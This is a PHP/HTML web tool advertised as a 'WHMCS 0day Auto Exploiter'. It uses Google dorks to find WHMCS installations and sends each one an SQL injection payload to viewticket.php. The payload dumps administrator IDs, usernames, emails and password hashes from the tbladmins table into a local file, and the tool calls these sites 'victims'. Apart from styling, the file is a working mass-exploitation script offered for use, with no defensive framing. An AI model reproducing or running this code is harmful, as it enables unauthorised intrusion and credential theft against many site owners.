WHMCS 0day Auto Exploiter <= 5.2.8

1. <?php
2. /*
3. *****************************************************
4.         WHMCS 0day Auto Exploiter <= 5.2.8
5.         Coded by g00n - Skype: t3hg00n
6.             wwww.xploiter.net
7. *****************************************************
8. Preview:
9. http://i.imgur.com/qB726Gm.png
10. In action:
11. http://i.imgur.com/oNpZAf6.png
12. http://i.imgur.com/gFlBjtD.png
13. *****************************************************
14. */
15.  
16. set_time_limit(0);
17. ini_set('memory_limit', '64M');
18. header('Content-Type: text/html; charset=UTF-8');
19. function letItBy(){ ob_flush(); flush(); }
20. function getAlexa($url)
21. {
22.     $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
23.     $rank1 = $xml->SD[1];
24.     if($rank1)
25.         $rank = $rank1->POPULARITY->attributes()->TEXT;
26.     else
27.         $rank = 0;
28.     return $rank;
29. }
30.    
31. function google_that($query, $page=1)
32. {
33.     $resultPerPage=8;
34.     $start = $page*$resultPerPage;
35.     $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
36.     $resultFromGoogle = json_decode( http_get($url, true) ,true);
37.     if(isset($resultFromGoogle['responseStatus'])) {
38.         if($resultFromGoogle['responseStatus'] != '200') return false;
39.         if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
40.         else return $resultFromGoogle['responseData']['results'];
41.     }
42.     else
43.         die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
44. }
45.    
46. function http_get($url, $safemode = false){
47.     if($safemode === true) sleep(1);
48.     $im = curl_init($url);
49.     curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
50.     curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
51.     curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
52.     curl_setopt($im, CURLOPT_HEADER, 0);
53.     return curl_exec($im);
54.     curl_close();
55. }
56.  
57. function check_vuln($url) {
58. $url = dirname($url) . '/viewticket.php';
59. $url = str_replace("/admin","",$url);
60.  
61. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
62. $curl_connection = curl_init($url);
63. if($curl_connection != false) {
64.     curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
65.     curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
66.     curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
67.     curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
68.     curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
69.     curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
70.     $source = curl_exec($curl_connection);
71.     preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
72.     if($infoz[0]) {
73.         return $infoz[0];
74.     }
75.     else
76.         return "Fail!";
77. }
78. else
79.     return "Fail!";
80. }
81. ?>
82. <html>
83. <head>
84. <title>WHMCS Auto Xploiter - by g00n</title>
85. </head>
86. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
87.  
88. <STYLE>
89. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
90. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
91. body {
92. font-family: Tahoma
93. }
94. tr {
95. BORDER: dashed 1px #333;
96. color: #FFF;
97. }
98. td {
99. BORDER: dashed 1px #333;
100. color: #FFF;
101. }
102. .table1 {
103. BORDER: 0px Black;
104. BACKGROUND-COLOR: Black;
105. color: #FFF;
106. }
107. .td1 {
108. BORDER: 0px;
109. BORDER-COLOR: #333333;
110. font: 7pt Verdana;
111. color: Green;
112. }
113. .tr1 {
114. BORDER: 0px;
115. BORDER-COLOR: #333333;
116. color: #FFF;
117. }
118. table {
119. BORDER: dashed 1px #333;
120. BORDER-COLOR: #333333;
121. BACKGROUND-COLOR: Black;
122. color: #FFF;
123. }
124. input {
125. border          : dashed 1px;
126. border-color        : #333;
127. BACKGROUND-COLOR: Black;
128. font: 8pt Verdana;
129. color: Red;
130. }
131. select {
132. BORDER-RIGHT:  Black 1px solid;
133. BORDER-TOP:    #DF0000 1px solid;
134. BORDER-LEFT:   #DF0000 1px solid;
135. BORDER-BOTTOM: Black 1px solid;
136. BORDER-color: #FFF;
137. BACKGROUND-COLOR: Black;
138. font: 8pt Verdana;
139. color: Red;
140. }
141. submit {
142. BORDER:  buttonhighlight 2px outset;
143. BACKGROUND-COLOR: Black;
144. width: 30%;
145. color: #FFF;
146. }
147. textarea {
148. border          : dashed 1px #333;
149. BACKGROUND-COLOR: Black;
150. font: Fixedsys bold;
151. color: #999;
152. }
153. BODY {
154.     SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
155. margin: 1px;
156. color: Red;
157. background-color: Black;
158. }
159. .main {
160. margin          : -287px 0px 0px -490px;
161. BORDER: dashed 1px #333;
162. BORDER-COLOR: #333333;
163. }
164. .tt {
165. background-color: Black;
166. }
167.  
168. A:link {
169.     COLOR: White; TEXT-DECORATION: none
170. }
171. A:visited {
172.     COLOR: White; TEXT-DECORATION: none
173. }
174. A:hover {
175.     color: Red; TEXT-DECORATION: none
176. }
177. A:active {
178.     color: Red; TEXT-DECORATION: none
179. }
180.  
181. #result{margin:10px;}
182. #result span{display:block;}
183. #result .Y{background-color:green;}
184. #result .X{background-color:red;}
185. </STYLE>
186. <script language=\'javascript\'>
187. function hide_div(id)
188. {
189.   document.getElementById(id).style.display = \'none\';
190.   document.cookie=id+\'=0;\';
191. }
192. function show_div(id)
193. {
194.   document.getElementById(id).style.display = \'block\';
195.   document.cookie=id+\'=1;\';
196. }
197. function change_divst(id)
198. {
199.   if (document.getElementById(id).style.display == \'none\')
200.     show_div(id);
201.   else
202.     hide_div(id);
203. }
204. </script>
205. </td></table></tr>
206. <br>
207. <br>
208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
209.     <style>
210.       body {
211.         font-family: 'Audiowide', serif;
212.         font-size: 30px;
213.        
214.       }
215.     </style>
216.   </head>
217.  
218.   <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
219.     <center>
220. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
221. <br>
222. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
223. </font>
224. <br><br>
225.  
226. <table border=1 bordercolor=red>
227. <tr>
228. <td width="700">
229. <br />
230. <center>
231.     <form method="post">
232.         Google Dork: &nbsp;&nbsp;
233.         <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
234.         &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
235.     </form>
236. <?php
237.     if(isset($_POST['dork']{0})) {
238.         $file = fopen("WMCS-Hashes.txt","a");
239.         echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';           
240.         letItBy();         
241.         for($googlePage = 1; $googlePage <= 50; $googlePage++) {
242.             $googleResult = google_that($_POST['dork'], $googlePage);
243.             if(!$googleResult) {
244.                 echo 'Finished scanning.';
245.                 fclose($file);
246.                 break;
247.             }
248.            
249.             for($victim = 0; $victim < sizeof($googleResult); $victim++){
250.                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
251.                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
252.                 if($result != "Fail!") {
253.                     $hashes = "";
254.                     foreach ($result as $record) {
255.                         $hashes = $hashes . str_replace(':::::','',$record) . "\n";
256.                     }
257.                     $sep = "========================================================\n";
258.                     $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
259.                     fwrite($file,$data);
260.                     echo "<br /><font color=\"green\">Successfully Xploited...</font>";
261.                     echo '<span class="Y">';
262.                     echo "<pre>" . $data . "</pre></span><br />";
263.                    
264.                 }
265.                 else {
266.                 echo '<span class="X">';
267.                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
268.                 echo "</span>\n<br />";
269.                 }
270.                 letItBy();
271.             }
272.         }
273.         echo '</div>';
274.     }
275. ?>
276. </center>
277. </td>
278. </table>
279. <br /><br />
280. <font face="Audiowide" color="red" size="2">
281. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
282. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
283. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
284. </font>
285.  
286. </center>
287. </body>
288. </html>